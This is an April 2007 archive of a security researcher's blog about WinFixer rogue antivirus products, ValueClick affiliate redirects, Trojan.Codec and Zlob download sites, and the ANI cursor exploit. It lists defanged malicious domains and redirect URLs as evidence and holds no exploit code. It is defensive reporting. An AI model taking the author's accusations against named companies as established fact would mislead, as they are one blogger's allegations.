April 2007 - Posts

Wed, Apr 25 2007 2:24

Microsoft releases Security Intelligence Report

Microsoft Security Intelligence Report (July – December 2006)
Overview: An in-depth perspective of software vulnerabilities, malicious code threats, and potentially unwanted software, focusing on the second half of 2006.

What I found interesting in their research is the WinFixer group is listed twice in the top six of Rogue Security products.

Ever wonder why you never see any of the WinFixer products listed in legitimate reviews? Looking at the StopBadware report should be enough to convince anyone ...

We find that WinAntiVirus 2006 (Unregistered Version) is badware because it makes exaggerated claims of system vulnerability in order to encourage the user to purchase the full version. In essence, WinAntiVirus 2006 (Unregistered Version) belongs to that subset of badware that is often termed "nagware" or "extortionware" -- that is, software that exists solely to encourage (generally through deceptive or annoying means) users to upgrade to a full version of the product. In addition, WinAntiVirus 2006 (Unregistered Version) automatically disables Windows Firewall without notifying to the user. It also fails to disclose to the user that the program will run automatically at start-up, continuously run a process in the background, or download updates without user consent.

Wikipedia says: "WinSoftware Ltd is a company that develops fake security software" ... these examples and the others I've blogged about previously leaves no doubt the type products and tactics they use to dupe the unsuspecting user.

However we still find ValueClick involved ... where they get a commission for the sale of these Rogue products ...

hxxp://go.winantispyware.com/NTY2Mg==/2/3345/ax=1/ed=1/ex=1/af6/
redirects to: (URLs disabled - view safely here)
hxxp://adfarm.mediaplex.com/ad/ck/45682?mpt=1177485361&aid=swp_was7&lid=3345&affid=pp_669127382&p=was&ed=1&ex=1

Since ValueClick is a publicly traded company (NASDAQ: VCLK) perhaps someone should inform the stockholders of just how their money is generated. (hard-core adult sites - depicted images of underage boys) No doubt a FTC investigation would result in a drop in stock prices and the shareholders would want to know why ...

Posted by winhelp2002 with no comments
Filed under:
Mon, Apr 23 2007 13:37

WinFixer and ValueClick in the UK

Browsing to winfixer.co.uk we find yet another connection between WinFixer and ValueClick. As you can see clicking the "Download Now" button routes you thru "adfarm.mediaplex.com" (ValueClick)

Once you click the button you end up on a (secure HTTPS) site where as you can see ValueClick supplies a WebBug (1x1 hidden image) to obtain a commission from the user (choke) purchasing this highly suspect bundle ...

Notice the TRUSTe symbol (highlighted) ... is WinFixer really a member? ... well I searched and searched and I could not find WinFixer or any of it other realated sites listed anywhere. Are users being scammed? It appears that ValueClick is willing to associate itself with the WinFixer group at any cost ...

Posted by winhelp2002 with 2 comment(s)
Filed under:
Sun, Apr 22 2007 3:30

More on WinFixer and ValueClick

Landing on "gaylovetwinks(dot)com" we find yet another adult site that generates it's revenue from linking to known Trojan.Codec sites. What is disturbing is again we find the WinFixer gang (Warning banner for go.sexprofit link) involved with this type activity.

What's even worse ... is when the McAfee SiteAdvisor bot scanned the same site we find another connection between WinFixer (drivecleaner and winantispyware) and ValueClick (mediaplex.com) ... so there is no doubt ValueClick has associated itself with some rather dubious characters ...

Given the nature of the above depicted images of underage boys, it really makes you wonder what ValueClick is thinking. Are things so bad that (supposedly) mainstream advertisers need to generate revenue this way?

 

Posted by winhelp2002 with 2 comment(s)
Filed under:
Sat, Apr 21 2007 23:36

More on WinFixer

Following a tip from one of my fellow Security researchers ... winpornvids(dot)com

This is yet another Trojan.Codec site where clicking on a image the viewer is presented the bogus message "Windows Media Player is unable to play movie file." While this is nothing new, what I find interesting is here again we find the WinFixer gang (go.drivecleaner link) involved with known malicious sites that the only purpose is to generate revenue by infecting the viewer.

I blogged about this the other day about the connection between ValueClick and the WinFixer gang. Hey ValueClick is this the type activity you really want to be associated with?

I highlighted in red several of the actual links (already listed in my HOSTS file) that lead to the Trojan.Codec infection ... do not visit there! You can view safely here instead.

Posted by winhelp2002 with 1 comment(s)
Filed under:
Fri, Apr 20 2007 2:53

Are Advertisers promoting Malware?

I was going to blog about another Trojan.Codec site I found, but truthfully this is getting boring ... instead I thought I'd do a follow-up on something I saw at Sunbelt's blog ...

Looking at the image SunBelt provided I saw oemtop(dot)com at the bottom. Now this is yet another "Google Warning" site ... so do not visit there, as there are multiple exploits on this Warez type site. In the image below you can see the cast of characters involved ...

What I find disturbing is, notice the two "CONNECT softwareprofit.com" entries? This is part of the WinFixer group ... nice place to advertise your products, a Warez type site that will infect your machine if you do not have the latest Windows updates, etc ... Now if you follow those connections:

hxxp://go.errorsafe.com/MTIxNjU=/2/3891// it redirects to the following:
hxxp://adfarm.mediaplex.com/ad/ck/45684?mpt=1177051780&aid=swp_ers&lid=3891&affid=pp_2296726171&p=ers&
(view safely here)

And another hxxp://go.winantivirus.com/MTM4MTM=/2/3891// that redirects to:
hxxp://adfarm.mediaplex.com/ad/ck/45678?mpt=1177052230&aid=swp_wa7p&lid=3891&affid=pp_2642226173&
(view safely here)

So here again we have "adfarm.mediaplex.com" involved with the WinFixer gang ... Sandi and others have exposed this ValueClick ad server before, yet they have not changed their ways suggesting that the $$$ is all they are after, even at the expense of their reputation.

Another exploit on the site is "vevdqimkcm(dot)info" (Trojan.PWS.Tanspy) which is already included in the HOSTS file, so a word to the wise ... stay far away from these Warez type sites!

You know I'm often asked why I block these ad servers ... "you may be blocking revenue from that site" ... well as you can see a huge majority of these ad servers are involved in very questionable tactics.

Posted by winhelp2002 with 2 comment(s)
Wed, Apr 11 2007 23:23

Yet Another bogus Image ActiveX Object Error

Landing on freeimageheaven(dot)com the visitor is presented with the following ... (bogus error)

This is another one of these sites that trap the visitor ... no matter which button you click you can not get out. If you click OK you are presented with a Trojan.Zlob file from imagemediasource(dot)com. However you can close the browser via Alt-F4.

Interesting this site was only registered 3 days ago ... doesn't take them long does it?

Posted by winhelp2002 with no comments
Mon, Apr 9 2007 0:55

HOSTS File Update 04-08-07


The MVPS HOSTS file was recently updated [04-08-07]
http://www.mvps.org/winhelp2002/hosts.htm

Download: hosts.zip (133 kb)
http://www.mvps.org/winhelp2002/hosts.zip

How To: Download and Extract the HOSTS file
http://www.mvps.org/winhelp2002/hosts2.htm

HOSTS File - Frequently Asked Questions
http://www.mvps.org/winhelp2002/hostsfaq.htm

Note: the "text" version makes a great resource
for determining possible culprits ... (555 kb)
http://www.mvps.org/winhelp2002/hosts.txt

Sign up for HOSTS file update notices
http://www.mvps.org/winhelp2002/hosts.htm#contribute

Posted by winhelp2002 with no comments
Sat, Apr 7 2007 21:19

Patch available for the ANI exploit

Everyone should make sure they have patched their system against this very nasty exploit!

The ANI exploit (Vulnerability in Windows Animated Cursor Handling) is still live in many places either by design or a hacked site. Working on a tip from Kat H about hornys-place(dot)com I found Google has already placed a warning about this site which has most likely been hacked by several culprits.

Upon visiting the site ... well you can see that IE7 (patched) blocks the exploit and prompts the user, also NOD32 jumps on the page (Win32/TrojanDownloader.Ani.Gen)

But if you look closer you'll see the exploit is not really from the visited site ... it's from a Javascript injected into the bottom of the page. Along with two other IFrame exploits! ... ouch! Now the sites I circled in red were already included in the HOSTS file. The javascript decodes to a page on codecsoft(dot)net

As I mentioned above even legit sites have been hacked and these type exploits are injected. A good example of this is a site Sandi blogged about on April 4th and it is still hacked! ... Unbelievable because this is a major hardware (motherboard) site ... asus(dot)com(dot)tw ... looks like their IT/Security people are (still) not very aware of what is going on!

Posted by winhelp2002 with no comments